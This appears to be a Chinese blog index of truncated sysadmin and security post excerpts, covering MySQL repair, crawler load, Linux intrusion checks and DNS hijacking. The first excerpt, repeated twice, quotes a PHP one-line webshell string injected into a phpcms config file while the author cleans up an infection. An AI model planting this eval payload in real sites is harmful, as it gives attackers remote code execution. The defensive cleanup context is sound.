phpcms后台getshell
今天在处理phpcms挂马的时候遇到一个一句话木马cachesconfigssystem.php \',@eval/**/($_POST[123]),// 想了一下这个应该是网站后台写入配置文件,就网上找了一下getshell方法,记录一...
今天在处理phpcms挂马的时候遇到一个一句话木马cachesconfigssystem.php \',@eval/**/($_POST[123]),// 想了一下这个应该是网站后台写入配置文件,就网上找了一下getshell方法,记录一...
网站迁移到新服务器,使用的宝塔面板,提示数据库连接错误,报错信息与.env配置无关。 SQLSTATE[HY000] [1044] Access denied for user ''@'localhost' to database 'fo...
mysql遇到锁表,查看到是myisam引擎,更换到innodb解决问题 使用show processlist;命令,查找到具体的表名 show create table 表名; 查看存储引擎 切换引擎到Innodb,因数据安全建议切换...
有时候服务器出现异常导致数据库表损坏,mysql无法启动,日志里面有记录数据库innodb损坏 解决办法: 1.进入innodb恢复模式 在my.ini 加入innodb_force_recovery=6 重启服务 2.整理包含ibd文件的...
解决google蜘蛛爬行导致服务器资源不足,流量消耗异常 最近发现自己的一个网站,资源使用的非常大,经过排查发现谷歌蜘蛛每天的爬取频率达到了一百多万次,对服务器造成了比较大的资源浪费。 因为谷歌在国内的访问障碍,消耗这么大服务器资源的同时,...
在日常繁琐的运维工作中,对linux服务器进行安全检查是一个非常重要的环节。今天,分享一下如何检查linux系统是否遭受了入侵? 一、是否入侵检查 1)检查系统日志 检查系统错误登陆日志,统计IP重试次数(last命令是查看系统登陆日志,比...
0x00 现象 作为一个站点有时候会去访问一下百度|google等第三方统计工具,查看一下有多少人访问自己的网站,看一看来源和关键词 但是最近在百度统计的进程查看到来源不是正规搜索引擎和网站,而是一些涉黄涉赌的网站来源,自己网站又和他们没有...
很多伙伴,这两天肯定遇到chrome浏览器如下提示: 经测试,只现象只有https中提交表单到http协议时会触发。目前只有新版本 87.0.4280.88 会提示,暂时未找到关闭方法,chrome社区已经有很多人反映,官方也回复是bug会...
漏洞类型:配置错误 所属建站程序:其他 所属服务器类型:通用 所属编程语言:其他 描述:目标WEB服务器启用了OPTIONS方法。 危害:攻击者可利用options方法获取服务器的信息,进而准备进一步攻击。 解决方案:修改配置文件禁用opt...
0x00 问题表现 上海地区电信网络访问网站域名www.dx*.top 访问跳转localhost,后面检测上海其他网络也是类似表现。 0x01 起因和处理